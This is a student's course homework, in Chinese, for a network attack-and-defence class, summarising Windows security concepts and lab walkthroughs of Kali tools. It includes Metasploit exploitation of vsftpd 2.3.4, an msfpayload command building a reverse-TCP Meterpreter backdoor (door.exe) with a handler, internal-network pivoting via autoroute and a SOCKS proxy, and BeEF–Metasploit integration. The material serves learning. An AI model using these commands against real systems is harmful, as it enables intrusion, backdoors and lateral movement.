1. 程式人生 > >20179301《網絡攻防實踐》第七周作業

20179301《網絡攻防實踐》第七周作業

server ice 根據 創建 編碼器 文件管理 不同 瀏覽器 tdi

a、教材《網絡攻防技術》第七章的學習

第七章Windouws操作系統安全攻防的內容進行學習。Windouws是目前市場上占統治地位的操作系統,到2010年,已經占據了百分之八十八的市場份額。基本結構分為運行於處理器特權模式的操作系統內核,已經運行在處理器非特權模式的用戶空間代碼,與UNIX一樣,采用宏內核模式來進行架構,這也使得系統更容易遭受Rootkit的危害,為了應對這種攻擊,采用數字簽名的辦法提高安全性。Windows操作系統中,有用戶,用戶組和計算機三大類,對於每個安全主體,空間和時間上都全局唯一的SID安全標識符來進行標識.對於Windows,遠程攻擊技術分為:遠程口令猜測與破解攻擊,攻擊Windows網絡服務,攻擊Windows客戶端及用戶這三大類。Windows通過基於服務器消息塊協議承載的文件與打印共享服務來為網絡用戶提供遠程訪問文件系統的和打印機的支持,所以SMB協議也成為了攻擊者實施遠程口令字猜測的攻擊渠道,目前自動執行遠程口令字猜測的工具有很多,其中比較流行的包括legin,enum,NTSscan等。攻擊者在目標系統上達到自己的需求和目的後,一般還會在系統中植入遠程控制系統,維持對這臺主機的控制權,比如一些命令行遠程控制工具Netcat,或者圖形化遠程控制工具,其中最著名的是VNC軟件。

Windows操作系統基本框架

1、windows基本結構分為運行於處理器特權模式的操作系統內核以及運行在處理器非特權模式的用戶,即為內核態和用戶態。2、內核態:windows執行體、windows內核體、設備驅動程序、硬件抽象層、windows窗口與圖形界面接口。3、用戶態:系統支持進程、環境子系統服務進程、服務進程、用戶應用軟件、核心子系統DLL。 4、核心機制:進程和線程管理機制、內存管理機制、文件管理機制、註冊表管理機制、網絡管理機制。5、網絡管理機制:網卡硬件驅動程序(物理層)、NDIS庫以及miniport驅動程序(鏈路層)、TDI傳輸層(網絡協議驅動)(網絡層和傳輸層)、網絡APID以及TDI客戶端(會話層和表示層)、網絡應用程序和服務進程(應用層).

安全體系結構和機制

1、監控器模型:主體到客體的訪問都通過監控器作中間,由引用監控器根據安全訪問控制策略來進行授權訪問,所有訪問記錄都由監控器生成審計日誌。2、核心:SRM安全引用監控(內核中)、LSASS安全服務(用戶態)、winlogon/netlogn、以及Eventlog 3、身份認證機制:安全主體:用戶、用戶組、計算機 身份認證:本地身份認證(winlogon進程、GINA圖形化登錄窗口與LSASS服務)、網絡身份認證(NTLM、Lanman、kerberos) 4、授權與訪問控制機制:對象:文件,目錄,註冊表鍵值,內核對象,同步對象,私有對象,管道,內存,通信接口。 屬性組成:Owner SID,Group SID,DACL自主訪問控制列表,SACL系統審計訪問控制列表。 5、安全審計機制 6、其他安全機制:安全中心(防火墻、補丁自動更新、病毒防護),IPsec加載和驗證機制,EPS加密文件系統,windows文件保護機制,捆綁的IE瀏覽器所提供的隱私保護和瀏覽器安全保護機制。

遠程安全攻防技術

1、包括遠程口令猜解攻擊、windows網絡服務攻擊,windows客戶端和用戶攻擊。2、生命周期:windows安全漏洞發現,利用與修補過程 安全漏洞公開披露信息 CVE,NVD,SecyrityFocus,OSVDB 針對特定目標的滲透測試攻擊過程:漏洞掃描測試、查找針對發現漏洞的滲透代碼、實施滲透測試 使用metasploit軟件實施滲透測試:用戶接口(CLI、Console,web,GUI) 3、遠程口令猜解攻擊: 遠程口令猜解:SMB協議(tcp445、tcp139),其他包括WMI服務、TS遠程桌面終端服務,MY SQL數據庫服務、SharePoint。工具包括:Legion、enum、smbgrind、NTScan、XScan、流光 遠程口令字交換通信竊聽與破解:NTLM、Lanman、NTLMV2和kerberos網絡認證協議的弱點。 遠程口令猜解的防範:關閉不必要的易受攻擊的網絡服務、配置主機防火墻來限制某些端口服務、網絡防火墻限制這些服務的訪問、禁用過時且有安全缺陷的Lanman和NTLM、指定強口令策略。4、網絡服務遠程滲透攻擊:針對NETBIOS服務的著名漏洞和攻擊、針對SMB服務的著名漏洞和攻擊、針對MSRPC服務的著名漏洞和攻擊、針對windows系統上微軟網絡的遠程滲透攻擊、針對windows系統上第三方服務的遠程滲透攻擊。 防範措施:最基本的是盡量避免與消除這些滲透攻擊所依賴的服務軟件安全漏洞。

本地安全攻防技術

1、本地提權攻擊:利用操作系統內核、特權用戶啟動程序中安全缺陷與漏洞,原因是服務器和桌面系統沒有即時進行補丁更新。2、敏感信息竊取: windows系統口令密文提取技術(拷貝口令密文文件、rdisk工具備份、pwdumpx從SAM文件或者活動目錄中提取口令密文) windows系統口令字破解技術(L0phtCrack、John theRipperCain) 用戶敏感數據竊取:find、findstr、grep、meterpreter 本地敏感信息竊取防範:選擇高強度、高防禦的口令,使用更安全的加密明文算法,安全配置策略。

windows消滅蹤跡

1、消滅蹤跡:關閉審計功能、清理事件日誌。 防範措施:事先設置系統審計和網絡服務審計,日誌記錄在不可擦除的CDROM上。 2、遠控和後門程序: 遠控:命令行遠控工具(Netcat,psexec,meterpreter),圖形化遠控工具(VNC,RemoteAdmin,PCanyware) 後門程序:國外(BO、BO2K),國內(冰河、灰鴿子、廣外女生、PCshare、磁碟機、機器狗等) 防範措施:後門檢測軟件、殺軟、rootkitrerealer、IcSword。

b、視頻學習

1、Kali 漏洞利用之檢索與利用

技術分享圖片

1、searchsploit可以借助關鍵詞搜索漏洞信息以及漏洞對應的exp
searchsploit wordpress
技術分享圖片
列出了漏洞和文件地址
查看列出的文件,例:
技術分享圖片

2、ikat自動化開啟不同的exp。等待目標訪問中招。
技術分享圖片

3、termineter旨在評估智能電表的安全性

2、Kali 漏洞利用之Metasploit基礎

Metasploit在滲透測試中經常被用到。這套軟件包括了很多工具,這些工具組成了一個完整的攻擊框架。

1、啟動服務
在Kali中使用Metasploit,需要先開啟PostgreSQL數據庫服務和metasploit服務,然後就可以利用msf數據庫查詢exploit和記錄。
2、路徑介紹
Kali中msf的路徑為/usr/share/metasploit-framework
技術分享圖片
技術分享圖片
技術分享圖片
3、基本命令
msfpayload:用來生成payload或者shellcode。 搜索可以用msfpayload -l |gre[ "windows"查詢; -o選項可以列出payload所需的參數。
msfencode:msf中的編碼器,早期用來繞過AV(殺毒軟件),現常用msfpayload與它編碼避免exploit的壞字符串。
msfconsole:開啟metasploit的console。
輸入msfconsole,打開msf
技術分享圖片

4、測試示例:發現漏洞,搜索exploit
nmap -sV 222.28.136.171
技術分享圖片
可以看到21端口開放的是ftp服務,用的版本是vsftpd 2.3.4
此版本是否存在漏洞,在msf裏用search vsftpd搜索一下
技術分享圖片
發現有匹配項

5、測試示例:選擇exploit,查看參數
技術分享圖片

進入exploit時發生點小問題,檢查之後發現是自己輸入錯誤,改正後正確進入
查看參數,發現RHOST的參數還未設置,接下來為其設置參數set RHOST 222.28.136.171

6、測試示例:選擇payload
技術分享圖片

設置好之後,show options查看參數,發現沒有要設置的參數了

8、執行攻擊
輸入exploit即可進行攻擊測試,如果成功,將返回一個shell:
技術分享圖片

此時可查看id,ip地址,還有一些文件信息等,可獲取目標主機的權限
技術分享圖片

3、Kali漏洞利用之Meterpreter介紹

技術分享圖片
技術分享圖片

生成Meterpreter後門;打開MSF,開啟監聽(選擇exploit/multi/handler);在目標機器上執行door.exe;
msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.234 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe /* 查看自己的IP地址為222.28.136.234,LHOST、LPORT為reverse_tcp的參數,可以在msf裏查看到(記得把服務啟動)*/
技術分享圖片
use exploit/multi/handler來接收返回的連接
設置reverse_tcp的LHOST、LPORT參數
技術分享圖片
技術分享圖片

此時執行生成後門的命令
技術分享圖片
生成了door.exe文件
技術分享圖片

4、Kali漏洞利用之Metasploit後滲透測試

在跳板獲取一定權限後需要積極地向內網主機權限發展,獲取指定的目標信息,探查系統漏洞,借助msf已經得到的Meterpreter後門,可以使系列的操作更容易。

1、查看當前網卡、網段信息(使用ifconfig)。可查看到三個網卡,一個是本地網卡,另一個是我們能訪問的網卡,還有一個網卡具有內網IP(訪問不到,可以ping以下試試)。
2、添加路由表run autoroute -s 10.0.0.1可以使用msf中的模塊跨網段攻擊或掃描。可通過腳本autoroute快速添加。
3、開socket代理,通過使用auxiliary/server/socks4a模塊,創建一個socks代理,可以為瀏覽器,sqlmap,nmap使用。通過代理即可訪問內網計算機。
4、通過background和session -i可以自由切換進入session。
5、輸入run可以看到在meterpreter上可以做的很多命令。
6、通過run post/可以看到後滲透測試模塊
7、獲取內網信息run arp_scanner -r 10.0.0.1/24
8、也可以上傳文件,做端口轉發後進行後續測試,例如upload lcx.exe c:\\傳送文件到c盤根目錄。

5、Kali漏洞利用之BeeF

技術分享圖片
1、在命令行下啟動BeeFbeef-xss
技術分享圖片
技術分享圖片
2、假設被測試主機由於XSS漏洞請求到http://127.0.0.1:3000/demos/basic.html
技術分享圖片
此時頁面左側就會多出一項在線主機:
技術分享圖片
技術分享圖片
技術分享圖片
技術分享圖片
在此,輸入的是hello world,如下返回成功!
技術分享圖片

5、Proxy功能(代理功能)
選中目標主機,點右鍵,在菜單中選中Use as Proxy;然後在Rider選項卡中的Forge Request編輯並發送想要發送的內容。
技術分享圖片
技術分享圖片

6、BeEF默認是不加載Metasploit的,如果要使用Metasploit豐富的攻擊模塊,需要做些配置.
默認:
技術分享圖片
配置:
首先打開beef xss目錄

cd /usr/share/beef-xss/
ls
nano config.yaml  /* 編輯一下,可以看到有很多配置信息,包括用戶名、密碼都可以在這設置,在此將Metasploit的false修改為true */
clear

技術分享圖片
技術分享圖片

保證此處IP等信息設置正確(不適用127.0.0.1,需使用本機IP),並修改Custom路徑:

cd extensions/metasploit/
ls
nano config.yaml   /* 將host和callback_host行的IP修改為本機IP,並修改custom路徑為/usr/share/metasploit-framework/ */

配置好後打開msfconsole,運行命令:

load msgrpc ServerHost=222.28.136.234 Pass=abc123

技術分享圖片

執行./beef -x
重新加載Metasploit的exploit模塊
技術分享圖片
加載之後,重啟下服務

service beef-xss restart

此時再訪問以下之前的頁面,發現無法連接,稍等片刻,使用默認用戶密碼登錄進去。發現Metasploit下多了許多模塊:
技術分享圖片

20179301《網絡攻防實踐》第七周作業